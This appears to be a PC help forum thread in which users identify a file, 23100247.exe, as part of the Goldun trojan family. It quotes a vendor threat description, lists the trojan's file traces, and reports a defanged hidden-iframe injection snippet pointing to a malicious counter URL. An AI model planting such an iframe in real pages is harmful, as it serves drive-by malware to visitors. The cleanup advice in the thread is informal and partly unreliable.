My Sygate firewall advised me that 23100247 is trying to broadcast. Not knowing what it is I blocked it.



I found it in the C drive, but it doesn't say what it belongs to.



I ran Spybot and Adaware and they didn't touch it. Anyone know what it is?

Hmm It seams to be part of a malware, 23100247.exe shows as part of Goldun.Fam. Has your utilities removed this recently?

Found a better discription on counter spy.....here.

An executable running from the root? (C:\) - I smell something fishy.

Sounds more like a virus, which is probably why Ad-Aware etc. didn't catch it. They're very specific.

Goldun.Fam

Type	Malware
Type Description	Malware ("malicious software") consists of software with clearly malicious, hostile, or harmful functionality or behavior and that is used to compromise and endanger individual PCs as well as entire networks.
Category	Trojan
Category Description	Trojan is a general term for malicious software that is installed under false or deceptive pretenses or is installed without the user's full knowledge and consent. Most Trojans exhibit some form of malicious, hostile, or harmful functionality or behavior.
Level	Severe
Level Description	Severe risk threats are typically installed without user interaction through security exploits, and may allow an attacker to remotely control the infected machine. Such threats may allow the attacker to install additional malware and use the compromised machine to participate in denial of service attacks, spamming, and bot nets, or to transmit sensitive data to a remote server. The malware may be cloaked and not visible to the user. These threats severely compromise the system by lowering security settings, installing “backdoors,” infecting system files, or spreading to other networked machines.
Advice Type	Remove
Description	Goldun.Fam is a family of Trojan horse programs that steals users' information entered for authentication on e-gold online web forms.
Add. Description	Goldun trojans may be packaged with the Savage.b MyDoom spambot installer, the SSA-Keylogger installer and/or Haxdoor. Goldun trojans sometimes use rootkit (cloaking) technology as well. Some variants are known to block access to antivirus sites.
Alias	Mcafee: PWS-Banker.ar; Kaspersky: Trojan-Spy.Win32.Goldun.ei; TrendMicro: TSPY_GOLDUN.AS; F-Secure: W32/Goldun.BY@pws; Bitdefender: Trojan.Spy.Goldun.EI
File Traces
	%PROFILE%\local settings\temp\oekekdjn.exe
	%PROFILE%\local settings\temp\tool1.exe
	%PROFILE%\local settings\temp\ver_prada.exe
	%PROFILE%\local settings\temporary internet files\main.exe
	%PROFILE%\local settings\temporary internet files\str.exe
	%ssytem%\avload32.dll
	%system%\apicrypt.dll
	%SYSTEM%\appwiz.dll
	%SYSTEM%\avpe32.dll
	%system%\axdebugl.dll
	%SYSTEM%\cdscsix3.dll
	%SYSTEM%\directpt.dll
	%system%\directut.dll
	%SYSTEM%\docent0.dll
	%system%\drop1.dll
	%SYSTEM%\dvd4free.dll
	%SYSTEM%\emldvc.dll
	%system%\flashdrvr.dll
	%SYSTEM%\gatexkey.dll
	%SYSTEM%\gdiwxp.dll
	%SYSTEM%\ideusr50.dll
	%system%\ies4dll.dll
	%SYSTEM%\iesdl4l.dll
	%SYSTEM%\javavm1.dll
	%SYSTEM%\mcfcc4.dll
	%SYSTEM%\mmxeroxk.dll
	%SYSTEM%\nclabydll.dll
	%SYSTEM%\obbn13t.dll
	%system%\pluginst.dll
	%SYSTEM%\pptp32.dll
	%system%\printpnp.dll
	%SYSTEM%\prwsks.dll
	%SYSTEM%\qz.dll
	%SYSTEM%\satmmc.dll
	%SYSTEM%\sdcard98.dll
	%SYSTEM%\se500mdm.dll
	%SYSTEM%\syswrk.dll
	%SYSTEM%\tcpgdc.dll
	%SYSTEM%\xcdmfree.dll
	%SYSTEM%\xkeyshll.dll
	%windows%\cpu.exe
	%windows%\csrss.exe
	%windows%\ie-hook.dll
	%windows%\local settings\temp\svchost.exe
	%windows%\local settings\temp\tool1.exe
	%windows%\local settings\temp\ver_prada.exe
	%windows%\local settings\temporary internet files\main.exe
	%windows%\local settings\temporary internet files\str.exe
	0001.exe
	1.exe
This is the culprit-->	23100247.exe
	a.exe
	appwiz.dll
	bl4ck.exe
	c:\s.exe
	c:\serv01.exe
	cpu.exe
	ddirectz.dll
	ddos.exe
	exefile.exe
	expl1.exe
	fedzo.exe
	file.exe
	file2.exe
	file62.exe
	final777.exe
	hpxsrdb.exe
	ideusr50.dll
	installer.exe
	inv.exe
	kazaBot.exe
	lasttry.exe
	mail.exe
	msits.exe
	msits__.exe
	protect.exe
	sas.exe
	sdcard98.dll
	serv.exe
	serv04.exe
	ServicePack.exe
	siosdjb.exe
	svchost.exe
	sys.exe
	temp109.exe
	temp209.exe
	test.exe
	tnelx.exe
	tool4.exe
	up.exe
	v010101.exe
	web.exe
	werewolf.exe
	wincorp.exe
	world.exe

You think click and delete will be enough? Because AVG didn't find it.

I would delete it while windows isnt running, thats the only way to be sure it isnt cached so it wont reproduce.

I alway delete Spyware in safemode (when it is not running)

And discontect the network cable just in case.

Well,, it could be that program used to communicate with North Korean Spy Satellites...

Hi, to everybody,
Atlast I found someone like me facing problem ( last 4 days
even your post was not visibale on google) . Read my story ..

Recently I notice '23100247.exe' ( 2173 bytes) laying on my computer c:\ ( root directory)
I searched on google but unable to find much info about this file.
then I tried to find more info on my computer and found that, the file was
installed by a website ( this website is for business and for freelancers and aff. marketing, have good partners, I can not disclose it's name because I am not sure, but I found following)
I have removed <> html marked so that It should not embedded in forum page
http is replace by hxxp
DO NOT VISIT FOLLOWING SITE UNLESS YOU ARE SECURITY EXPERT, AND KNOW WHAT YOU ARE DOING
1) Main html file having some javascript funtion opeing to
div style="visibility:hidden"> iframe src="hxxp://dnv-counter.com/dnv3/" width=1 height=1 /iframe /div

2) If you visit above ( be careful) URL, You may get above file ( I have not tried this,
but think it is hosted by above url) , even you find start.exe in temp. internet folder, both files
appeares to be same. that means above url code copied start.exe to root with 23100247.exe name.
3) I think some code is downloaded and do all aboe stuff.
4) I don't know it is secrete counter to trace visitor or malware ( or the website I have visited may be
Infected by malware)
5) If this a secrete counter then this is incorrect, they have to show notice before making copy to my system
6) I scan with norton anti virus ( with latest update full system scan and that file also) but
it says no infection found
I downloaded trial version of spyware doctor from download.com, It only showing
alex bho option entries in registry and alert level is low, no referance for above file.

I search on dnv-counter.com on google but unable to find any info.

In google search , on one forum I found
A)
The site called us-counter.com and dnv-counter.com belong to a guy from Ukraine and are blacklisted with several records. IP´s from the sites and from the hosting company are pretty much the same."
B) found some referance in forum regaring : us-counter.com/trf1 ( before may be doing same thing )

But unable understand it ..
6) ok now my query is
a) what is going on ( I have deleted 23100247.exe)
b) what It did to my system
c) how I come to know what they have stolen ( or downloaded from my system)
d) Can I relay on my anti virus / spyware doctor clean report

plz help assp.
Thanks in advance

Quote: Originally Posted by ap3000 But unable understand it .. 6) ok now my query is a) what is going on ( I have deleted 23100247.exe) : Check your firewal for the items with aproved traffic, if you don't know the application running, block it. b) what It did to my system : With stray lines of code in everyones system Lord knows what it is effecting. c) how I come to know what they have stolen ( or downloaded from my system) : Not to sure on that, could have been everything or nothing? d) Can I relay on my anti virus / spyware doctor clean report : The best you can do is update regularly and hope for the best. New codes are created every day and just useing a PC is a risk anymore. plz help assp. Thanks in advance

First Off, Welcome to PCApex.

You english is a bit off but i think I get what you are asking.